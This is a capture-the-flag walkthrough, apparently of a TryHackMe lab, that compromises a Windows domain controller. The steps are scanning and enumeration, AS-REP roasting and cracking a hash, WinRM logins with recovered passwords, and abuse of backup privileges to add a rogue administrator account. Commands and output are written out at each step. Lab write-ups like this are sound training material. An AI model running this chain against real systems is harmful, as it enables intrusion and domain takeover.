Fusion Corp
Reconnaissance
As it is a complex Windows machine, a well-executed reconnaissance phase is critical for being able to correctly solve it and get root, as it will help us understand how to get foothold and maybe even help pivoting for later on. So let us start with an aggressive NMAP scan
sudo nmap -A -p- -v -T5 -n -Pn 10.10.120.49 -oN targeted
Nmap scan report for 10.10.120.49
Host is up (0.040s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: eBusiness Bootstrap Template
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-26 17:40:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-06-26T17:42:28+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-25T17:36:29
| Not valid after: 2022-12-25T17:36:29
| MD5: 6218 0cb4 ee16 8c28 0d16 358c 75f5 80a4
|_SHA-1: ebee d9d4 c101 d934 4679 90fe e8fe e48b c503 ab79
| rdp-ntlm-info:
| Target_Name: FUSION
| NetBIOS_Domain_Name: FUSION
| NetBIOS_Computer_Name: FUSION-DC
| DNS_Domain_Name: fusion.corp
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2022-06-26T17:41:49+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-06-26T17:41:50
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 40.01 ms 10.8.0.1
2 40.03 ms 10.10.120.49Quite complex at first look, but we can see it is the actual domain controller so it's not surprising to see so many services. We can also see the domain name is "fusion.corp", so I recommend adding it to /etc/hosts.
One simple and fast tool to use in these cases is enum4linux, as it will proceed in a quick recon of rpc, smb, ldap, etc.
enum4linux fusion.corp
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 26 13:44:41 2022
=========================================( Target Information )=========================================
Target ........... 10.10.120.49
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.120.49 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.120.49 )================================
Looking up status of 10.10.120.49
No reply from 10.10.120.49
===================================( Session Check on 10.10.120.49 )===================================
[+] Server 10.10.120.49 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.120.49 )================================
Domain Name: FUSION
Domain Sid: S-1-5-21-1898838421-3672757654-990739655
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.120.49 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.120.49 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.120.49 )=======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
=================================( Share Enumeration on 10.10.120.49 )=================================
do_connect: Connection to 10.10.120.49 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.120.49
============================( Password Policy Information for 10.10.120.49 )============================
[E] Unexpected error from polenum:
[+] Attaching to 10.10.120.49 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.10.120.49)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=======================================( Groups on 10.10.120.49 )=======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.120.49 via RID cycling (RIDS: 500-550,1000-1050) )==================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
===============================( Getting printer info for 10.10.120.49 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sun Jun 26 13:45:09 2022Well, that really was not as helpful as one would have hoped for, so let's move onto more advanced/manual scanning.
Foothold
As it seems, rpc and smb need credentials to list content, and we do not yet have valid usernames for any kerberos attacks. So next step would be to take a look at the web application.
At first it looks like a WIP bootstrap template, so my first thought, as we had a valid domain name, was to search for subdomains.
gobuster vhost -u "http://fusion.corp" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://fusion.corp
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/26 13:56:08 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2022/06/26 13:56:38 Finished
===============================================================But nothing, so next logical step was to try directory enumeration.
gobuster dir -u "http://fusion.corp" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://fusion.corp
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/26 13:57:18 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 146] [--> http://fusion.corp/img/]
/css (Status: 301) [Size: 146] [--> http://fusion.corp/css/]
/lib (Status: 301) [Size: 146] [--> http://fusion.corp/lib/]
/js (Status: 301) [Size: 145] [--> http://fusion.corp/js/]
/backup (Status: 301) [Size: 149] [--> http://fusion.corp/backup/]
/Backup (Status: 301) [Size: 149] [--> http://fusion.corp/Backup/]
/IMG (Status: 301) [Size: 146] [--> http://fusion.corp/IMG/]
/contactform (Status: 301) [Size: 154] [--> http://fusion.corp/contactform/]
/CSS (Status: 301) [Size: 146] [--> http://fusion.corp/CSS/]
/Img (Status: 301) [Size: 146] [--> http://fusion.corp/Img/]
/JS (Status: 301) [Size: 145] [--> http://fusion.corp/JS/]
/Lib (Status: 301) [Size: 146] [--> http://fusion.corp/Lib/]
===============================================================
2022/06/26 14:02:47 Finished
===============================================================Now we finally have something; a backup directory with directory listing capabilities, which shows a backup "employees.ods" file that we can download.
Now we have some potential usernames. We could now try to validate them with kerbrute.
go run main.go userenum --domain fusion.corp --dc 10.10.120.49 ../users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 06/26/22 - Ronnie Flathers @ropnop
2022/06/26 14:08:35 > Using KDC(s):
2022/06/26 14:08:35 > 10.10.120.49:88
2022/06/26 14:08:36 > [+] lparker has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$lparker@FUSION.CORP:70bcaabfba43d1b9cf13057672680bdb$a664505d347d254bed42cc46fe73a6bbc974ed2eaadf31797601365d097a04f0e1845649c750af6650fdfa853d8b779450a386cd46d5d8e3d042612fba0ad77db00b8c2ebe93f4bba12843ad30f4d9ab9dfdcd235e24434dd60e5b54a0a0d0134d428d0d212059222d43e5809e49d929c03e15acbabae666c536bc344569fb5c0e166baf97dc24240e172a323855729294dc95cce30423315c08ce3ddbd990e1626f10e44bd3b7ce239a633e1abf993610714c734bfe30a8ce23675ca1788a08e8f2b133c863e34c46155c31270d89574689a99fb9482812b5985513035001e633aca51571e812a2bf3b4f0c99c142483cfefdbc96204a4b8c82b823d1f6
2022/06/26 14:08:36 > [+] VALID USERNAME: lparker@fusion.corp
2022/06/26 14:08:36 > Done! Tested 11 usernames (1 valid) in 0.090 secondsPerfect, looks like "lparker" is valid and vulnerable to AS_REP roasting (Note that you can also use impacket-GetNPUsers or Rubeus to get the same result), so next step is to try and crack it's hash offline with e.g hashcat or john.
john lparker.krb -w=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!abbylvzsvs2k6! ($krb5asrep$23$lparker@FUSION.CORP)
1g 0:00:00:00 DONE (2022-06-26 14:16) 1.052g/s 2591Kp/s 2591Kc/s 2591KC/s !@#$%&..หรพรืะฟๅ/-ภ
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Nice, we finally have our first credentials. Crackmapexec is a good tool to validate them.
crackmapexec smb fusion.corp -u 'lparker' -p '!!abbylvzsvs2k6!'
SMB fusion.corp 445 FUSION-DC [*] Windows 10.0 Build 17763 x64 (name:FUSION-DC) (domain:fusion.corp) (signing:True) (SMBv1:False)
SMB fusion.corp 445 FUSION-DC [+] fusion.corp\lparker:!!abbylvzsvs2k6!For some reason crackmapexec didn't work with winrm, but trying it manually with evil-wirnm allows us to login remotely.
evil-winrm -i fusion.corp -u 'lparker' -p '!!abbylvzsvs2k6!'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lparker\Documents> cd ..
*Evil-WinRM* PS C:\Users\lparker> cd Desktop
*Evil-WinRM* PS C:\Users\lparker\Desktop> dir
Directory: C:\Users\lparker\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:04 AM 37 flag.txt
*Evil-WinRM* PS C:\Users\lparker\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\Users\lparker\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\lparker\Desktop>Nice, finally we have foothold. Let us move onto pivoting now.
Pivoting
From what it looks like, we can see another user "jmpurphy" in C:\Users\, other than our current "lparker" user and Administrator, so we may need to keep enumerating for valid credentials on that user.
Gathering some information on the domain, look's like jmurphy password is leaked by the user's description.
*Evil-WinRM* PS C:\Users> net user jmurphy
User name jmurphy
Full Name Joseph Murphy
Comment Password set to u8WC3!kLsgw=#bRY
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/3/2021 6:41:24 AM
Password expires Never
Password changeable 3/3/2021 6:41:24 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users> Well that was easy, if we had had the initial PS terminal from a reverse shell we would need to execute a reverse shell to get a terminal on jmurphy' computer, but since winRM service is open we can just log in as jmurphy as we had entered as lparker.
evil-winrm -i fusion.corp -u jmurphy -p "u8WC3!kLsgw=#bRY"
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jmurphy\Documents> cd ..
*Evil-WinRM* PS C:\Users\jmurphy> cd Desktop
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> dir
Directory: C:\Users\jmurphy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:04 AM 37 flag.txt
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> Perfect, let us try to pivot to domain admin now.
Administrator
Looking back at the privileges we had from the last executed command, we can see that we have privileges to backup as well as restore files in the filesystem. One way to abuse this is by modifying the ACLs as we please and, that way, we can add a user and assign it administrator privileges. For that, I am gonna be using this PowerShell script.
*Evil-WinRM* PS C:\Users\jmurphy\Documents> upload Backup-ToSystem.ps1
Info: Uploading Backup-ToSystem.ps1 to C:\Users\jmurphy\Documents\Backup-ToSystem.ps1
Data: 6152 bytes of 6152 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Import-Module C:\Users\jmurphy\Documents\Backup-ToSystem.ps1
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Backup-ToSystem -command "net user max TestVar123 /add"
___ _ ____ __ _
/ __\ __ _ ___| | ___ _ _ __|___ \/ _\_ _ ___| |_ ___ _ __ ___
/__\/// _` |/ __| |/ / | | | '_ \ __) \ \| | | / __| __/ _ \ '_ ` _ \
/ \/ \ (_| | (__| <| |_| | |_) / __/_\ \ |_| \__ \ || __/ | | | | |
\_____/\__,_|\___|_|\_\\__,_| .__/_____\__/\__, |___/\__\___|_| |_| |_|
|_| |___/
by CyberVaca
[+] Backup ACL
[+] Changing ACL
[+] Writing Payload
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
Warning: Waiting for service 'Virtual Disk (vds)' to stop...
[+] Trigger Payload
[+] Deleting temp Files
[+] Restore files
[+] Restore backup ACL
*Evil-WinRM* PS C:\Users\jmurphy\Documents> net user max
User name max
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/26/2022 1:53:24 PM
Password expires Never
Password changeable 6/26/2022 1:53:24 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.However, we can see that we aren't yet in the administrators group, but we can easily add ourselves to the group in the same manner.
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Backup-ToSystem -command "net localgroup Administrators max /add"
___ _ ____ __ _
/ __\ __ _ ___| | ___ _ _ __|___ \/ _\_ _ ___| |_ ___ _ __ ___
/__\/// _` |/ __| |/ / | | | '_ \ __) \ \| | | / __| __/ _ \ '_ ` _ \
/ \/ \ (_| | (__| <| |_| | |_) / __/_\ \ |_| \__ \ || __/ | | | | |
\_____/\__,_|\___|_|\_\\__,_| .__/_____\__/\__, |___/\__\___|_| |_| |_|
|_| |___/
by CyberVaca
[+] Backup ACL
[+] Changing ACL
[+] Writing Payload
[+] Trigger Payload
[+] Deleting temp Files
[+] Restore files
[+] Restore backup ACL
*Evil-WinRM* PS C:\Users\jmurphy\Documents> net user max
User name max
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/26/2022 1:53:24 PM
Password expires Never
Password changeable 6/26/2022 1:53:24 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Finally, we can log in as our new users and get the administrator flag.
┌──(max㉿1337)-[~/fusioncorp]
└─$ evil-winrm -i fusion.corp -u "max" -p "TestVar123"
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\max\Documents> cd C:\users\Administrator
*Evil-WinRM* PS C:\users\Administrator> dir
cd
Directory: C:\users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 3/7/2021 2:04 AM 3D Objects
d-r--- 3/7/2021 2:04 AM Contacts
d-r--- 3/7/2021 2:04 AM Desktop
d-r--- 3/7/2021 2:04 AM Documents
d-r--- 3/7/2021 2:04 AM Downloads
d-r--- 3/7/2021 2:04 AM Favorites
d-r--- 3/7/2021 2:04 AM Links
d-r--- 3/7/2021 2:04 AM Music
d-r--- 3/7/2021 2:04 AM Pictures
d-r--- 3/7/2021 2:04 AM Saved Games
d-r--- 3/7/2021 2:04 AM Searches
d-r--- 3/7/2021 2:04 AM Videos
*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> dir
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2021 6:05 AM 37 flag.txt
t*Evil-WinRM* PS C:\users\Administrator\Desktop> type flag.txt
THM{redacted}
*Evil-WinRM* PS C:\users\Administrator\Desktop>And that's finally it, gotta say I had quite a bit of fun with this machine, but it definitely shouldn't be on the hard category in my opinion.